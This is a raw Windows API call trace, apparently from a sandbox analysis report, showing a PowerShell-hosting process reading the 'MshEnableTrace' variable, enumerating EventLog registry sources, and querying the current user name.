	[0641.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0641.970] CoTaskMemFree (pv=0x1b8c08b0) 
	[0644.128] CoTaskMemAlloc (cb=0x104) returned 0x1b8c08b0
	[0644.128] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8c08b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0644.128] CoTaskMemFree (pv=0x1b8c08b0) 
	[0644.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d218 | out: phkResult=0x24d218*=0x300) returned 0x0
	[0644.145] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.145] CoTaskMemFree (pv=0x0) 
	[0644.146] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.146] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.146] CoTaskMemFree (pv=0x471920) 
	[0644.146] CoTaskMemFree (pv=0x0) 
	[0644.146] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.146] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.146] CoTaskMemFree (pv=0x471920) 
	[0644.146] CoTaskMemFree (pv=0x0) 
	[0644.146] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.146] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.146] CoTaskMemFree (pv=0x471920) 
	[0644.146] CoTaskMemFree (pv=0x0) 
	[0644.147] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.147] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.147] CoTaskMemFree (pv=0x471920) 
	[0644.147] CoTaskMemFree (pv=0x0) 
	[0644.147] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.147] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.147] CoTaskMemFree (pv=0x471920) 
	[0644.147] CoTaskMemFree (pv=0x0) 
	[0644.147] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.147] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.147] CoTaskMemFree (pv=0x471920) 
	[0644.147] CoTaskMemFree (pv=0x0) 
	[0644.147] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.147] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.147] CoTaskMemFree (pv=0x471920) 
	[0644.147] CoTaskMemFree (pv=0x0) 
	[0644.147] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.148] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.148] CoTaskMemFree (pv=0x471920) 
	[0644.148] CoTaskMemFree (pv=0x0) 
	[0644.148] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0644.148] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x471920, lpcchName=0x24d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0644.148] CoTaskMemFree (pv=0x471920) 
	[0644.148] CoTaskMemFree (pv=0x0) 
	[0644.148] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x2f8) returned 0x0
	[0644.148] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.148] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x318) returned 0x0
	[0644.148] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.148] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x320) returned 0x0
	[0644.149] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.149] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x324) returned 0x0
	[0644.149] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.149] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x328) returned 0x0
	[0644.149] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.149] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x32c) returned 0x0
	[0644.149] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.149] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x330) returned 0x0
	[0644.150] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.150] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x334) returned 0x0
	[0644.150] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x0) returned 0x2
	[0644.150] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x338) returned 0x0
	[0644.150] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d278 | out: phkResult=0x24d278*=0x33c) returned 0x0
	[0644.150] RegCloseKey (hKey=0x33c) returned 0x0
	[0644.150] RegCloseKey (hKey=0x300) returned 0x0
	[0644.151] RegCloseKey (hKey=0x338) returned 0x0
	[0644.162] CoTaskMemAlloc (cb=0x804) returned 0x1b8e6ee0
	[0644.163] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8e6ee0, nSize=0x24d488 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d488) returned 0x1
	[0646.219] CoTaskMemFree (pv=0x1b8e6ee0) 
	[0646.220] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0646.220] GetUserNameW (in: lpBuffer=0x471920, pcbBuffer=0x24d4c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d4c8) returned 1
	[0646.220] CoTaskMemFree (pv=0x471920) 
	[0648.343] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x340) returned 0x0
	[0648.343] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.343] CoTaskMemFree (pv=0x0) 
	[0648.343] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.343] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.343] CoTaskMemFree (pv=0x471920) 
	[0648.343] CoTaskMemFree (pv=0x0) 
	[0648.343] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.343] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.344] CoTaskMemFree (pv=0x471920) 
	[0648.344] CoTaskMemFree (pv=0x0) 
	[0648.344] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.344] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.344] CoTaskMemFree (pv=0x471920) 
	[0648.344] CoTaskMemFree (pv=0x0) 
	[0648.344] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.344] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.344] CoTaskMemFree (pv=0x471920) 
	[0648.344] CoTaskMemFree (pv=0x0) 
	[0648.344] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.344] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.344] CoTaskMemFree (pv=0x471920) 
	[0648.344] CoTaskMemFree (pv=0x0) 
	[0648.344] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.344] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.344] CoTaskMemFree (pv=0x471920) 
	[0648.344] CoTaskMemFree (pv=0x0) 
	[0648.344] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.344] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.345] CoTaskMemFree (pv=0x471920) 
	[0648.345] CoTaskMemFree (pv=0x0) 
	[0648.345] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.345] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.345] CoTaskMemFree (pv=0x471920) 
	[0648.345] CoTaskMemFree (pv=0x0) 
	[0648.345] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.345] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.345] CoTaskMemFree (pv=0x471920) 
	[0648.345] CoTaskMemFree (pv=0x0) 
	[0648.345] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x344) returned 0x0
	[0648.345] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.345] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x348) returned 0x0
	[0648.346] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.346] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x34c) returned 0x0
	[0648.346] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.346] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x350) returned 0x0
	[0648.346] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.346] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x354) returned 0x0
	[0648.346] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.346] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x358) returned 0x0
	[0648.347] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.347] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x35c) returned 0x0
	[0648.347] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.347] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x360) returned 0x0
	[0648.347] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.347] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x364) returned 0x0
	[0648.347] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x368) returned 0x0
	[0648.347] RegCloseKey (hKey=0x368) returned 0x0
	[0648.348] RegCloseKey (hKey=0x340) returned 0x0
	[0648.348] RegCloseKey (hKey=0x364) returned 0x0
	[0648.349] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d1c8 | out: phkResult=0x24d1c8*=0x364) returned 0x0
	[0648.349] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d13c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d138*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.349] CoTaskMemFree (pv=0x0) 
	[0648.349] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.349] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.349] CoTaskMemFree (pv=0x471920) 
	[0648.349] CoTaskMemFree (pv=0x0) 
	[0648.349] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.349] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.350] CoTaskMemFree (pv=0x471920) 
	[0648.350] CoTaskMemFree (pv=0x0) 
	[0648.350] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.350] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.350] CoTaskMemFree (pv=0x471920) 
	[0648.350] CoTaskMemFree (pv=0x0) 
	[0648.350] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.350] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.350] CoTaskMemFree (pv=0x471920) 
	[0648.350] CoTaskMemFree (pv=0x0) 
	[0648.350] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.350] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.350] CoTaskMemFree (pv=0x471920) 
	[0648.350] CoTaskMemFree (pv=0x0) 
	[0648.350] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.350] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.351] CoTaskMemFree (pv=0x471920) 
	[0648.351] CoTaskMemFree (pv=0x0) 
	[0648.351] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.351] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.351] CoTaskMemFree (pv=0x471920) 
	[0648.351] CoTaskMemFree (pv=0x0) 
	[0648.351] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.351] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.351] CoTaskMemFree (pv=0x471920) 
	[0648.351] CoTaskMemFree (pv=0x0) 
	[0648.351] CoTaskMemAlloc (cb=0x204) returned 0x471920
	[0648.351] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x471920, lpcchName=0x24d1c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d1c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0648.351] CoTaskMemFree (pv=0x471920) 
	[0648.351] CoTaskMemFree (pv=0x0) 
	[0648.351] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x340) returned 0x0
	[0648.351] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.352] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x368) returned 0x0
	[0648.352] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.352] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x36c) returned 0x0
	[0648.352] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.352] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x370) returned 0x0
	[0648.352] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.352] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x374) returned 0x0
	[0648.352] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.352] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x378) returned 0x0
	[0648.353] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.353] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x37c) returned 0x0
	[0648.353] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.353] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x380) returned 0x0
	[0648.353] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x0) returned 0x2
	[0648.353] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x384) returned 0x0
	[0648.353] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d228 | out: phkResult=0x24d228*=0x388) returned 0x0
	[0648.354] RegCloseKey (hKey=0x388) returned 0x0
	[0648.354] RegCloseKey (hKey=0x364) returned 0x0
	[0648.354] RegCloseKey (hKey=0x384) returned 0x0
	[0648.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d198 | out: phkResult=0x24d198*=0x384) returned 0x0
